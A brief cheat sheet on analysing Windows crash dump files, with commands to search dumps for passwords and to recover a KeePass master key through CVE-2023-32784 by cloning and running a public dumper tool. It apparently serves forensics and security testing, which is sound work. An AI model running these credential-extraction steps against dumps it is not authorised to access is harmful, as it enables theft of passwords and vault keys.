Windows Memory Dump Analysis

A memory dump file (.dmp), also called as 'crash dump' is a crash report file.

Investigation

file example.dmp
# Output
example.dmp: Mini DuMP crash report, 18 streams, Sat Nov ...

Static Analysis

We can also read contents of this file by usual static analysis such as below.

strings example.dmp
strings example.dmp | grep -i password
# Open pager
strings example.dmp | less

xxd example.dmp

Using Debugger

• IDA, ILSpy
• Visual Studio

Using Online Viewer

This file can also be read with online DMP viewer.

Dump KeePass Master Key (CVE-2023-32784)

If the .dmp file contains KeePass memory, we might be able to dump the master key. This vulnerability exists in KeePass 2.x before 2.54. keepass-password-dumpter is useful to do that.

In Windows, run the follwoing command.

git clone https://github.com/vdohney/keepass-password-dumper.git
cd keepass-password-dumper
dotnet run example.dmp